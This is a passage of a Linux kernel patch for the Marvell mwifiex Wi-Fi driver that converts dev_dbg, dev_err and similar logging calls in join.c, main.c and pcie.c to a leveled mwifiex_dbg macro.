HostCmd_CMD_MAC_CONTROL, HostCmd_ACT_GEN_SET, 0, &curr_pkt_filter, false)) { - dev_err(priv->adapter->dev, - "ADHOC_J_CMD: G Protection config failed\n"); + mwifiex_dbg(priv->adapter, ERROR, + "ADHOC_J_CMD: G Protection config failed\n"); return -1; } } @@ -1116,14 +1127,15 @@ mwifiex_cmd_802_11_ad_hoc_join(struct mwifiex_private *priv, tmp_cap &= CAPINFO_MASK; - dev_dbg(priv->adapter->dev, - "info: ADHOC_J_CMD: tmp_cap=%4X CAPINFO_MASK=%4lX\n", - tmp_cap, CAPINFO_MASK); + mwifiex_dbg(priv->adapter, INFO, + "info: ADHOC_J_CMD: tmp_cap=%4X CAPINFO_MASK=%4lX\n", + tmp_cap, CAPINFO_MASK); /* Information on BSSID descriptor passed to FW */ - dev_dbg(priv->adapter->dev, "info: ADHOC_J_CMD: BSSID=%pM, SSID='%s'\n", - adhoc_join->bss_descriptor.bssid, - adhoc_join->bss_descriptor.ssid); + mwifiex_dbg(priv->adapter, INFO, + "info: ADHOC_J_CMD: BSSID=%pM, SSID='%s'\n", + adhoc_join->bss_descriptor.bssid, + adhoc_join->bss_descriptor.ssid); for (i = 0; i < MWIFIEX_SUPPORTED_RATES && bss_desc->supported_rates[i]; i++) @@ -1159,14 +1171,14 @@ mwifiex_cmd_802_11_ad_hoc_join(struct mwifiex_private *priv, sizeof(struct mwifiex_chan_scan_param_set)); chan_tlv->chan_scan_param[0].chan_number = (bss_desc->phy_param_set.ds_param_set.current_chan); - dev_dbg(priv->adapter->dev, "info: ADHOC_J_CMD: TLV Chan=%d\n", - chan_tlv->chan_scan_param[0].chan_number); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_J_CMD: TLV Chan=%d\n", + chan_tlv->chan_scan_param[0].chan_number); chan_tlv->chan_scan_param[0].radio_type = mwifiex_band_to_radio_type((u8) bss_desc->bss_band); - dev_dbg(priv->adapter->dev, "info: ADHOC_J_CMD: TLV Band=%d\n", - chan_tlv->chan_scan_param[0].radio_type); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_J_CMD: TLV Band=%d\n", + chan_tlv->chan_scan_param[0].radio_type); pos += sizeof(chan_tlv->header) + sizeof(struct mwifiex_chan_scan_param_set); cmd_append_size += sizeof(chan_tlv->header) + @@ -1220,7 +1232,7 @@ int mwifiex_ret_802_11_ad_hoc(struct mwifiex_private *priv, /* Join result code 0 --> SUCCESS */ reason_code = le16_to_cpu(resp->result); if (reason_code) { - dev_err(priv->adapter->dev, "ADHOC_RESP: failed\n"); + mwifiex_dbg(priv->adapter, ERROR, "ADHOC_RESP: failed\n"); if (priv->media_connected) mwifiex_reset_connect_state(priv, reason_code); @@ -1235,8 +1247,8 @@ int mwifiex_ret_802_11_ad_hoc(struct mwifiex_private *priv, priv->media_connected = true; if (le16_to_cpu(resp->command) == HostCmd_CMD_802_11_AD_HOC_START) { - dev_dbg(priv->adapter->dev, "info: ADHOC_S_RESP %s\n", - bss_desc->ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_S_RESP %s\n", + bss_desc->ssid.ssid); /* Update the created network descriptor with the new BSSID */ memcpy(bss_desc->mac_address, @@ -1248,8 +1260,9 @@ int mwifiex_ret_802_11_ad_hoc(struct mwifiex_private *priv, * Now the join cmd should be successful. * If BSSID has changed use SSID to compare instead of BSSID */ - dev_dbg(priv->adapter->dev, "info: ADHOC_J_RESP %s\n", - bss_desc->ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, + "info: ADHOC_J_RESP %s\n", + bss_desc->ssid.ssid); /* * Make a copy of current BSSID descriptor, only needed for @@ -1262,10 +1275,10 @@ int mwifiex_ret_802_11_ad_hoc(struct mwifiex_private *priv, priv->adhoc_state = ADHOC_JOINED; } - dev_dbg(priv->adapter->dev, "info: ADHOC_RESP: channel = %d\n", - priv->adhoc_channel); - dev_dbg(priv->adapter->dev, "info: ADHOC_RESP: BSSID = %pM\n", - priv->curr_bss_params.bss_descriptor.mac_address); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_RESP: channel = %d\n", + priv->adhoc_channel); + mwifiex_dbg(priv->adapter, INFO, "info: ADHOC_RESP: BSSID = %pM\n", + priv->curr_bss_params.bss_descriptor.mac_address); if (!netif_carrier_ok(priv->netdev)) netif_carrier_on(priv->netdev); @@ -1327,12 +1340,12 @@ int mwifiex_adhoc_start(struct mwifiex_private *priv, struct cfg80211_ssid *adhoc_ssid) { - dev_dbg(priv->adapter->dev, "info: Adhoc Channel = %d\n", - priv->adhoc_channel); - dev_dbg(priv->adapter->dev, "info: curr_bss_params.channel = %d\n", - priv->curr_bss_params.bss_descriptor.channel); - dev_dbg(priv->adapter->dev, "info: curr_bss_params.band = %d\n", - priv->curr_bss_params.band); + mwifiex_dbg(priv->adapter, INFO, "info: Adhoc Channel = %d\n", + priv->adhoc_channel); + mwifiex_dbg(priv->adapter, INFO, "info: curr_bss_params.channel = %d\n", + priv->curr_bss_params.bss_descriptor.channel); + mwifiex_dbg(priv->adapter, INFO, "info: curr_bss_params.band = %d\n", + priv->curr_bss_params.band); if (ISSUPP_11ACENABLED(priv->adapter->fw_cap_info) && priv->adapter->config_bands & BAND_AAC) @@ -1353,14 +1366,16 @@ mwifiex_adhoc_start(struct mwifiex_private *priv, int mwifiex_adhoc_join(struct mwifiex_private *priv, struct mwifiex_bssdescriptor *bss_desc) { - dev_dbg(priv->adapter->dev, "info: adhoc join: curr_bss ssid =%s\n", - priv->curr_bss_params.bss_descriptor.ssid.ssid); - dev_dbg(priv->adapter->dev, "info: adhoc join: curr_bss ssid_len =%u\n", - priv->curr_bss_params.bss_descriptor.ssid.ssid_len); - dev_dbg(priv->adapter->dev, "info: adhoc join: ssid =%s\n", - bss_desc->ssid.ssid); - dev_dbg(priv->adapter->dev, "info: adhoc join: ssid_len =%u\n", - bss_desc->ssid.ssid_len); + mwifiex_dbg(priv->adapter, INFO, + "info: adhoc join: curr_bss ssid =%s\n", + priv->curr_bss_params.bss_descriptor.ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, + "info: adhoc join: curr_bss ssid_len =%u\n", + priv->curr_bss_params.bss_descriptor.ssid.ssid_len); + mwifiex_dbg(priv->adapter, INFO, "info: adhoc join: ssid =%s\n", + bss_desc->ssid.ssid); + mwifiex_dbg(priv->adapter, INFO, "info: adhoc join: ssid_len =%u\n", + bss_desc->ssid.ssid_len); /* Check if the requested SSID is already joined */ if (priv->curr_bss_params.bss_descriptor.ssid.ssid_len && @@ -1368,8 +1383,9 @@ int mwifiex_adhoc_join(struct mwifiex_private *priv, &priv->curr_bss_params.bss_descriptor.ssid) && (priv->curr_bss_params.bss_descriptor.bss_mode == NL80211_IFTYPE_ADHOC)) { - dev_dbg(priv->adapter->dev, "info: ADHOC_J_CMD: new ad-hoc SSID" - " is the same as current; not attempting to re-join\n"); + mwifiex_dbg(priv->adapter, INFO, + "info: ADHOC_J_CMD: new ad-hoc SSID\t" + "is the same as current; not attempting to re-join\n"); return -1; } @@ -1380,10 +1396,12 @@ int mwifiex_adhoc_join(struct mwifiex_private *priv, else mwifiex_set_ba_params(priv); - dev_dbg(priv->adapter->dev, "info: curr_bss_params.channel = %d\n", - priv->curr_bss_params.bss_descriptor.channel); - dev_dbg(priv->adapter->dev, "info: curr_bss_params.band = %c\n", - priv->curr_bss_params.band); + mwifiex_dbg(priv->adapter, INFO, + "info: curr_bss_params.channel = %d\n", + priv->curr_bss_params.bss_descriptor.channel); + mwifiex_dbg(priv->adapter, INFO, + "info: curr_bss_params.band = %c\n", + priv->curr_bss_params.band); return mwifiex_send_cmd(priv, HostCmd_CMD_802_11_AD_HOC_JOIN, HostCmd_ACT_GEN_SET, 0, bss_desc, true); diff --git a/drivers/net/wireless/mwifiex/main.c b/drivers/net/wireless/mwifiex/main.c index eca4378eddda..138c1cccf7d3 100644 --- a/drivers/net/wireless/mwifiex/main.c +++ b/drivers/net/wireless/mwifiex/main.c @@ -94,7 +94,8 @@ static int mwifiex_register(void *card, struct mwifiex_if_ops *if_ops, return 0; error: - dev_dbg(adapter->dev, "info: leave mwifiex_register with error\n"); + mwifiex_dbg(adapter, ERROR, + "info: leave mwifiex_register with error\n"); for (i = 0; i < adapter->priv_num; i++) kfree(adapter->priv[i]); @@ -459,8 +460,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) struct wireless_dev *wdev; if (!firmware) { - dev_err(adapter->dev, - "Failed to get firmware %s\n", adapter->fw_name); + mwifiex_dbg(adapter, ERROR, + "Failed to get firmware %s\n", adapter->fw_name); goto err_dnld_fw; } @@ -476,13 +477,13 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) if (ret == -1) goto err_dnld_fw; - dev_notice(adapter->dev, "WLAN FW is active\n"); + mwifiex_dbg(adapter, MSG, "WLAN FW is active\n"); if (cal_data_cfg) { if ((request_firmware(&adapter->cal_data, cal_data_cfg, adapter->dev)) < 0) - dev_err(adapter->dev, - "Cal data request_firmware() failed\n"); + mwifiex_dbg(adapter, ERROR, + "Cal data request_firmware() failed\n"); } /* enable host interrupt after fw dnld is successful */ @@ -507,12 +508,14 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) priv = adapter->priv[MWIFIEX_BSS_ROLE_STA]; if (mwifiex_register_cfg80211(adapter)) { - dev_err(adapter->dev, "cannot register with cfg80211\n"); + mwifiex_dbg(adapter, ERROR, + "cannot register with cfg80211\n"); goto err_init_fw; } if (mwifiex_init_channel_scan_gap(adapter)) { - dev_err(adapter->dev, "could not init channel stats table\n"); + mwifiex_dbg(adapter, ERROR, + "could not init channel stats table\n"); goto err_init_fw; } @@ -526,7 +529,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) wdev = mwifiex_add_virtual_intf(adapter->wiphy, "mlan%d", NET_NAME_ENUM, NL80211_IFTYPE_STATION, NULL, NULL); if (IS_ERR(wdev)) { - dev_err(adapter->dev, "cannot create default STA interface\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create default STA interface\n"); rtnl_unlock(); goto err_add_intf; } @@ -535,7 +539,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) wdev = mwifiex_add_virtual_intf(adapter->wiphy, "uap%d", NET_NAME_ENUM, NL80211_IFTYPE_AP, NULL, NULL); if (IS_ERR(wdev)) { - dev_err(adapter->dev, "cannot create AP interface\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create AP interface\n"); rtnl_unlock(); goto err_add_intf; } @@ -546,8 +551,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) NL80211_IFTYPE_P2P_CLIENT, NULL, NULL); if (IS_ERR(wdev)) { - dev_err(adapter->dev, - "cannot create p2p client interface\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create p2p client interface\n"); rtnl_unlock(); goto err_add_intf; } @@ -555,7 +560,7 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) rtnl_unlock(); mwifiex_drv_get_driver_version(adapter, fmt, sizeof(fmt) - 1); - dev_notice(adapter->dev, "driver_version = %s\n", fmt); + mwifiex_dbg(adapter, MSG, "driver_version = %s\n", fmt); goto done; err_add_intf: @@ -565,7 +570,8 @@ static void mwifiex_fw_dpc(const struct firmware *firmware, void *context) if (adapter->if_ops.disable_int) adapter->if_ops.disable_int(adapter); err_dnld_fw: - pr_debug("info: %s: unregister device\n", __func__); + mwifiex_dbg(adapter, ERROR, + "info: %s: unregister device\n", __func__); if (adapter->if_ops.unregister_dev) adapter->if_ops.unregister_dev(adapter); @@ -606,8 +612,8 @@ static int mwifiex_init_hw_fw(struct mwifiex_adapter *adapter) adapter->dev, GFP_KERNEL, adapter, mwifiex_fw_dpc); if (ret < 0) - dev_err(adapter->dev, - "request_firmware_nowait() returned error %d\n", ret); + mwifiex_dbg(adapter, ERROR, + "request_firmware_nowait error %d\n", ret); return ret; } @@ -633,7 +639,8 @@ mwifiex_close(struct net_device *dev) struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); if (priv->scan_request) { - dev_dbg(priv->adapter->dev, "aborting scan on ndo_stop\n"); + mwifiex_dbg(priv->adapter, INFO, + "aborting scan on ndo_stop\n"); cfg80211_scan_done(priv->scan_request, 1); priv->scan_request = NULL; priv->scan_aborting = true; @@ -654,7 +661,8 @@ int mwifiex_queue_tx_pkt(struct mwifiex_private *priv, struct sk_buff *skb) txq = netdev_get_tx_queue(priv->netdev, index); if (!netif_tx_queue_stopped(txq)) { netif_tx_stop_queue(txq); - dev_dbg(priv->adapter->dev, "stop queue: %d\n", index); + mwifiex_dbg(priv->adapter, DATA, + "stop queue: %d\n", index); } } @@ -719,8 +727,9 @@ mwifiex_hard_start_xmit(struct sk_buff *skb, struct net_device *dev) struct mwifiex_txinfo *tx_info; bool multicast; - dev_dbg(priv->adapter->dev, "data: %lu BSS(%d-%d): Data <= kernel\n", - jiffies, priv->bss_type, priv->bss_num); + mwifiex_dbg(priv->adapter, DATA, + "data: %lu BSS(%d-%d): Data <= kernel\n", + jiffies, priv->bss_type, priv->bss_num); if (priv->adapter->surprise_removed) { kfree_skb(skb); @@ -728,28 +737,31 @@ mwifiex_hard_start_xmit(struct sk_buff *skb, struct net_device *dev) return 0; } if (!skb->len || (skb->len > ETH_FRAME_LEN)) { - dev_err(priv->adapter->dev, "Tx: bad skb len %d\n", skb->len); + mwifiex_dbg(priv->adapter, ERROR, + "Tx: bad skb len %d\n", skb->len); kfree_skb(skb); priv->stats.tx_dropped++; return 0; } if (skb_headroom(skb) < MWIFIEX_MIN_DATA_HEADER_LEN) { - dev_dbg(priv->adapter->dev, - "data: Tx: insufficient skb headroom %d\n", - skb_headroom(skb)); + mwifiex_dbg(priv->adapter, DATA, + "data: Tx: insufficient skb headroom %d\n", + skb_headroom(skb)); /* Insufficient skb headroom - allocate a new skb */ new_skb = skb_realloc_headroom(skb, MWIFIEX_MIN_DATA_HEADER_LEN); if (unlikely(!new_skb)) { - dev_err(priv->adapter->dev, "Tx: cannot alloca new_skb\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Tx: cannot alloca new_skb\n"); kfree_skb(skb); priv->stats.tx_dropped++; return 0; } kfree_skb(skb); skb = new_skb; - dev_dbg(priv->adapter->dev, "info: new skb headroomd %d\n", - skb_headroom(skb)); + mwifiex_dbg(priv->adapter, INFO, + "info: new skb headroomd %d\n", + skb_headroom(skb)); } tx_info = MWIFIEX_SKB_TXCB(skb); @@ -807,8 +819,8 @@ mwifiex_set_mac_address(struct net_device *dev, void *addr) if (!ret) memcpy(priv->netdev->dev_addr, priv->curr_addr, ETH_ALEN); else - dev_err(priv->adapter->dev, - "set mac address failed: ret=%d\n", ret); + mwifiex_dbg(priv->adapter, ERROR, + "set mac address failed: ret=%d\n", ret); memcpy(dev->dev_addr, priv->curr_addr, ETH_ALEN); @@ -846,15 +858,17 @@ mwifiex_tx_timeout(struct net_device *dev) priv->num_tx_timeout++; priv->tx_timeout_cnt++; - dev_err(priv->adapter->dev, - "%lu : Tx timeout(#%d), bss_type-num = %d-%d\n", - jiffies, priv->tx_timeout_cnt, priv->bss_type, priv->bss_num); + mwifiex_dbg(priv->adapter, ERROR, + "%lu : Tx timeout(#%d), bss_type-num = %d-%d\n", + jiffies, priv->tx_timeout_cnt, priv->bss_type, + priv->bss_num); mwifiex_set_trans_start(dev); if (priv->tx_timeout_cnt > TX_TIMEOUT_THRESHOLD && priv->adapter->if_ops.card_reset) { - dev_err(priv->adapter->dev, - "tx_timeout_cnt exceeds threshold. Triggering card reset!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "tx_timeout_cnt exceeds threshold.\t" + "Triggering card reset!\n"); priv->adapter->if_ops.card_reset(priv->adapter); } } @@ -875,7 +889,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) adapter->drv_info_size = 0; } - dev_info(adapter->dev, "=== DRIVER INFO DUMP START===\n"); + mwifiex_dbg(adapter, MSG, "=== DRIVER INFO DUMP START===\n"); adapter->drv_info_dump = vzalloc(MWIFIEX_DRV_INFO_SIZE_MAX); @@ -963,7 +977,7 @@ void mwifiex_dump_drv_info(struct mwifiex_adapter *adapter) } adapter->drv_info_size = p - adapter->drv_info_dump; - dev_info(adapter->dev, "=== DRIVER INFO DUMP END===\n"); + mwifiex_dbg(adapter, MSG, "=== DRIVER INFO DUMP END===\n"); } EXPORT_SYMBOL_GPL(mwifiex_dump_drv_info); @@ -1234,21 +1248,24 @@ int mwifiex_remove_card(struct mwifiex_adapter *adapter, struct semaphore *sem) } } - dev_dbg(adapter->dev, "cmd: calling mwifiex_shutdown_drv...\n"); + mwifiex_dbg(adapter, CMD, + "cmd: calling mwifiex_shutdown_drv...\n"); adapter->init_wait_q_woken = false; if (mwifiex_shutdown_drv(adapter) == -EINPROGRESS) wait_event_interruptible(adapter->init_wait_q, adapter->init_wait_q_woken); - dev_dbg(adapter->dev, "cmd: mwifiex_shutdown_drv done\n"); + mwifiex_dbg(adapter, CMD, + "cmd: mwifiex_shutdown_drv done\n"); if (atomic_read(&adapter->rx_pending) || atomic_read(&adapter->tx_pending) || atomic_read(&adapter->cmd_pending)) { - dev_err(adapter->dev, "rx_pending=%d, tx_pending=%d, " - "cmd_pending=%d\n", - atomic_read(&adapter->rx_pending), - atomic_read(&adapter->tx_pending), - atomic_read(&adapter->cmd_pending)); + mwifiex_dbg(adapter, ERROR, + "rx_pending=%d, tx_pending=%d,\t" + "cmd_pending=%d\n", + atomic_read(&adapter->rx_pending), + atomic_read(&adapter->tx_pending), + atomic_read(&adapter->cmd_pending)); } for (i = 0; i < adapter->priv_num; i++) { @@ -1268,11 +1285,13 @@ int mwifiex_remove_card(struct mwifiex_adapter *adapter, struct semaphore *sem) wiphy_free(adapter->wiphy); /* Unregister device */ - dev_dbg(adapter->dev, "info: unregister device\n"); + mwifiex_dbg(adapter, INFO, + "info: unregister device\n"); if (adapter->if_ops.unregister_dev) adapter->if_ops.unregister_dev(adapter); /* Free adapter structure */ - dev_dbg(adapter->dev, "info: free adapter\n"); + mwifiex_dbg(adapter, INFO, + "info: free adapter\n"); mwifiex_free_adapter(adapter); exit_remove: diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index 88bda3f68164..7219243e9994 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -57,7 +57,7 @@ mwifiex_map_pci_memory(struct mwifiex_adapter *adapter, struct sk_buff *skb, mapping.addr = pci_map_single(card->dev, skb->data, size, flags); if (pci_dma_mapping_error(card->dev, mapping.addr)) { - dev_err(adapter->dev, "failed to map pci memory!\n"); + mwifiex_dbg(adapter, ERROR, "failed to map pci memory!\n"); return -1; } mapping.len = size; @@ -89,8 +89,9 @@ static bool mwifiex_pcie_ok_to_access_hw(struct mwifiex_adapter *adapter) if (card->sleep_cookie_vbase) { cookie_addr = (u32 *)card->sleep_cookie_vbase; - dev_dbg(adapter->dev, "info: ACCESS_HW: sleep cookie=0x%x\n", - *cookie_addr); + mwifiex_dbg(adapter, INFO, + "info: ACCESS_HW: sleep cookie=0x%x\n", + *cookie_addr); if (*cookie_addr == FW_AWAKE_COOKIE) return true; } @@ -164,7 +165,8 @@ static int mwifiex_pcie_resume(struct device *dev) adapter = card->adapter; if (!adapter->is_suspended) { - dev_warn(adapter->dev, "Device already resumed\n"); + mwifiex_dbg(adapter, WARN, + "Device already resumed\n"); return 0; } @@ -361,16 +363,16 @@ static void mwifiex_delay_for_sleep_cookie(struct mwifiex_adapter *adapter, sleep_cookie = *(u32 *)buffer; if (sleep_cookie == MWIFIEX_DEF_SLEEP_COOKIE) { - dev_dbg(adapter->dev, - "sleep cookie found at count %d\n", count); + mwifiex_dbg(adapter, INFO, + "sleep cookie found at count %d\n", count); break; } usleep_range(20, 30); } if (count >= max_delay_loop_cnt) - dev_dbg(adapter->dev, - "max count reached while accessing sleep cookie\n"); + mwifiex_dbg(adapter, INFO, + "max count reached while accessing sleep cookie\n"); } /* This function wakes up the card by reading fw_status register. */ @@ -380,20 +382,23 @@ static int mwifiex_pm_wakeup_card(struct mwifiex_adapter *adapter) struct pcie_service_card *card = adapter->card; const struct mwifiex_pcie_card_reg *reg = card->pcie.reg; - dev_dbg(adapter->dev, "event: Wakeup device...\n"); + mwifiex_dbg(adapter, EVENT, + "event: Wakeup device...\n"); if (reg->sleep_cookie) mwifiex_pcie_dev_wakeup_delay(adapter); /* Reading fw_status register will wakeup device */ if (mwifiex_read_reg(adapter, reg->fw_status, &fw_status)) { - dev_warn(adapter->dev, "Reading fw_status register failed\n"); + mwifiex_dbg(adapter, ERROR, + "Reading fw_status register failed\n"); return -1; } if (reg->sleep_cookie) { mwifiex_pcie_dev_wakeup_delay(adapter); - dev_dbg(adapter->dev, "PCIE wakeup: Setting PS_STATE_AWAKE\n"); + mwifiex_dbg(adapter, INFO, + "PCIE wakeup: Setting PS_STATE_AWAKE\n"); adapter->ps_state = PS_STATE_AWAKE; } @@ -407,7 +412,8 @@ static int mwifiex_pm_wakeup_card(struct mwifiex_adapter *adapter) */ static int mwifiex_pm_wakeup_card_complete(struct mwifiex_adapter *adapter) { - dev_dbg(adapter->dev, "cmd: Wakeup device completed\n"); + mwifiex_dbg(adapter, CMD, + "cmd: Wakeup device completed\n"); return 0; } @@ -423,7 +429,8 @@ static int mwifiex_pcie_disable_host_int(struct mwifiex_adapter *adapter) if (mwifiex_pcie_ok_to_access_hw(adapter)) { if (mwifiex_write_reg(adapter, PCIE_HOST_INT_MASK, 0x00000000)) { - dev_warn(adapter->dev, "Disable host interrupt failed\n"); + mwifiex_dbg(adapter, ERROR, + "Disable host interrupt failed\n"); return -1; } } @@ -443,7 +450,8 @@ static int mwifiex_pcie_enable_host_int(struct mwifiex_adapter *adapter) /* Simply write the mask to the register */ if (mwifiex_write_reg(adapter, PCIE_HOST_INT_MASK, HOST_INTR_MASK)) { - dev_warn(adapter->dev, "Enable host interrupt failed\n"); + mwifiex_dbg(adapter, ERROR, + "Enable host interrupt failed\n"); return -1; } } @@ -499,8 +507,8 @@ static int mwifiex_init_rxq_ring(struct mwifiex_adapter *adapter) skb = mwifiex_alloc_dma_align_buf(MWIFIEX_RX_DATA_BUF_SIZE, GFP_KERNEL | GFP_DMA); if (!skb) { - dev_err(adapter->dev, - "Unable to allocate skb for RX ring.\n"); + mwifiex_dbg(adapter, ERROR, + "Unable to allocate skb for RX ring.\n"); kfree(card->rxbd_ring_vbase); return -ENOMEM; } @@ -512,10 +520,10 @@ static int mwifiex_init_rxq_ring(struct mwifiex_adapter *adapter) buf_pa = MWIFIEX_SKB_DMA_ADDR(skb); - dev_dbg(adapter->dev, - "info: RX ring: skb=%p len=%d data=%p buf_pa=%#x:%x\n", - skb, skb->len, skb->data, (u32)buf_pa, - (u32)((u64)buf_pa >> 32)); + mwifiex_dbg(adapter, INFO, + "info: RX ring: skb=%p len=%d data=%p buf_pa=%#x:%x\n", + skb, skb->len, skb->data, (u32)buf_pa, + (u32)((u64)buf_pa >> 32)); card->rx_buf_list[i] = skb; if (reg->pfu_enabled) { @@ -556,8 +564,8 @@ static int mwifiex_pcie_init_evt_ring(struct mwifiex_adapter *adapter) /* Allocate skb here so that firmware can DMA data from it */ skb = dev_alloc_skb(MAX_EVENT_SIZE); if (!skb) { - dev_err(adapter->dev, - "Unable to allocate skb for EVENT buf.\n"); + mwifiex_dbg(adapter, ERROR, + "Unable to allocate skb for EVENT buf.\n"); kfree(card->evtbd_ring_vbase); return -ENOMEM; } @@ -569,10 +577,10 @@ static int mwifiex_pcie_init_evt_ring(struct mwifiex_adapter *adapter) buf_pa = MWIFIEX_SKB_DMA_ADDR(skb); - dev_dbg(adapter->dev, - "info: EVT ring: skb=%p len=%d data=%p buf_pa=%#x:%x\n", - skb, skb->len, skb->data, (u32)buf_pa, - (u32)((u64)buf_pa >> 32)); + mwifiex_dbg(adapter, EVENT, + "info: EVT ring: skb=%p len=%d data=%p buf_pa=%#x:%x\n", + skb, skb->len, skb->data, (u32)buf_pa, + (u32)((u64)buf_pa >> 32)); card->evt_buf_list[i] = skb; card->evtbd_ring[i] = (void *)(card->evtbd_ring_vbase + @@ -715,21 +723,23 @@ static int mwifiex_pcie_create_txbd_ring(struct mwifiex_adapter *adapter) card->txbd_ring_size = sizeof(struct mwifiex_pcie_buf_desc) * MWIFIEX_MAX_TXRX_BD; - dev_dbg(adapter->dev, "info: txbd_ring: Allocating %d bytes\n", - card->txbd_ring_size); + mwifiex_dbg(adapter, INFO, + "info: txbd_ring: Allocating %d bytes\n", + card->txbd_ring_size); card->txbd_ring_vbase = pci_alloc_consistent(card->dev, card->txbd_ring_size, &card->txbd_ring_pbase); if (!card->txbd_ring_vbase) { - dev_err(adapter->dev, - "allocate consistent memory (%d bytes) failed!\n", - card->txbd_ring_size); + mwifiex_dbg(adapter, ERROR, + "allocate consistent memory (%d bytes) failed!\n", + card->txbd_ring_size); return -ENOMEM; } - dev_dbg(adapter->dev, - "info: txbd_ring - base: %p, pbase: %#x:%x, len: %x\n", - card->txbd_ring_vbase, (unsigned int)card->txbd_ring_pbase, - (u32)((u64)card->txbd_ring_pbase >> 32), card->txbd_ring_size); + mwifiex_dbg(adapter, DATA, + "info: txbd_ring - base: %p, pbase: %#x:%x, len: %x\n", + card->txbd_ring_vbase, (unsigned int)card->txbd_ring_pbase, + (u32)((u64)card->txbd_ring_pbase >> 32), + card->txbd_ring_size); return mwifiex_init_txq_ring(adapter); } @@ -777,23 +787,24 @@ static int mwifiex_pcie_create_rxbd_ring(struct mwifiex_adapter *adapter) card->rxbd_ring_size = sizeof(struct mwifiex_pcie_buf_desc) * MWIFIEX_MAX_TXRX_BD; - dev_dbg(adapter->dev, "info: rxbd_ring: Allocating %d bytes\n", - card->rxbd_ring_size); + mwifiex_dbg(adapter, INFO, + "info: rxbd_ring: Allocating %d bytes\n", + card->rxbd_ring_size); card->rxbd_ring_vbase = pci_alloc_consistent(card->dev, card->rxbd_ring_size, &card->rxbd_ring_pbase); if (!card->rxbd_ring_vbase) { - dev_err(adapter->dev, - "allocate consistent memory (%d bytes) failed!\n", - card->rxbd_ring_size); + mwifiex_dbg(adapter, ERROR, + "allocate consistent memory (%d bytes) failed!\n", + card->rxbd_ring_size); return -ENOMEM; } - dev_dbg(adapter->dev, - "info: rxbd_ring - base: %p, pbase: %#x:%x, len: %#x\n", - card->rxbd_ring_vbase, (u32)card->rxbd_ring_pbase, - (u32)((u64)card->rxbd_ring_pbase >> 32), - card->rxbd_ring_size); + mwifiex_dbg(adapter, DATA, + "info: rxbd_ring - base: %p, pbase: %#x:%x, len: %#x\n", + card->rxbd_ring_vbase, (u32)card->rxbd_ring_pbase, + (u32)((u64)card->rxbd_ring_pbase >> 32), + card->rxbd_ring_size); return mwifiex_init_rxq_ring(adapter); } @@ -840,23 +851,24 @@ static int mwifiex_pcie_create_evtbd_ring(struct mwifiex_adapter *adapter) card->evtbd_ring_size = sizeof(struct mwifiex_evt_buf_desc) * MWIFIEX_MAX_EVT_BD; - dev_dbg(adapter->dev, "info: evtbd_ring: Allocating %d bytes\n", + mwifiex_dbg(adapter, INFO, + "info: evtbd_ring: Allocating %d bytes\n", card->evtbd_ring_size); card->evtbd_ring_vbase = pci_alloc_consistent(card->dev, card->evtbd_ring_size, &card->evtbd_ring_pbase); if (!card->evtbd_ring_vbase) { - dev_err(adapter->dev, - "allocate consistent memory (%d bytes) failed!\n", - card->evtbd_ring_size); + mwifiex_dbg(adapter, ERROR, + "allocate consistent memory (%d bytes) failed!\n", + card->evtbd_ring_size); return -ENOMEM; } - dev_dbg(adapter->dev, - "info: CMDRSP/EVT bd_ring - base: %p pbase: %#x:%x len: %#x\n", - card->evtbd_ring_vbase, (u32)card->evtbd_ring_pbase, - (u32)((u64)card->evtbd_ring_pbase >> 32), - card->evtbd_ring_size); + mwifiex_dbg(adapter, EVENT, + "info: CMDRSP/EVT bd_ring - base: %p pbase: %#x:%x len: %#x\n", + card->evtbd_ring_vbase, (u32)card->evtbd_ring_pbase, + (u32)((u64)card->evtbd_ring_pbase >> 32), + card->evtbd_ring_size); return mwifiex_pcie_init_evt_ring(adapter); } @@ -895,8 +907,8 @@ static int mwifiex_pcie_alloc_cmdrsp_buf(struct mwifiex_adapter *adapter) /* Allocate memory for receiving command response data */ skb = dev_alloc_skb(MWIFIEX_UPLD_SIZE); if (!skb) { - dev_err(adapter->dev, - "Unable to allocate skb for command response data.\n"); + mwifiex_dbg(adapter, ERROR, + "Unable to allocate skb for command response data.\n"); return -ENOMEM; } skb_put(skb, MWIFIEX_UPLD_SIZE); @@ -944,14 +956,16 @@ static int mwifiex_pcie_alloc_sleep_cookie_buf(struct mwifiex_adapter *adapter) card->sleep_cookie_vbase = pci_alloc_consistent(card->dev, sizeof(u32), &card->sleep_cookie_pbase); if (!card->sleep_cookie_vbase) { - dev_err(adapter->dev, "pci_alloc_consistent failed!\n"); + mwifiex_dbg(adapter, ERROR, + "pci_alloc_consistent failed!\n"); return -ENOMEM; } /* Init val of Sleep Cookie */ *(u32 *)card->sleep_cookie_vbase = FW_AWAKE_COOKIE; - dev_dbg(adapter->dev, "alloc_scook: sleep cookie=0x%x\n", - *((u32 *)card->sleep_cookie_vbase)); + mwifiex_dbg(adapter, INFO, + "alloc_scook: sleep cookie=0x%x\n", + *((u32 *)card->sleep_cookie_vbase)); return 0; } @@ -993,8 +1007,8 @@ static int mwifiex_clean_pcie_ring_buf(struct mwifiex_adapter *adapter) */ if (mwifiex_write_reg(adapter, PCIE_CPU_INT_EVENT, CPU_INTR_DNLD_RDY)) { - dev_err(adapter->dev, - "failed to assert dnld-rdy 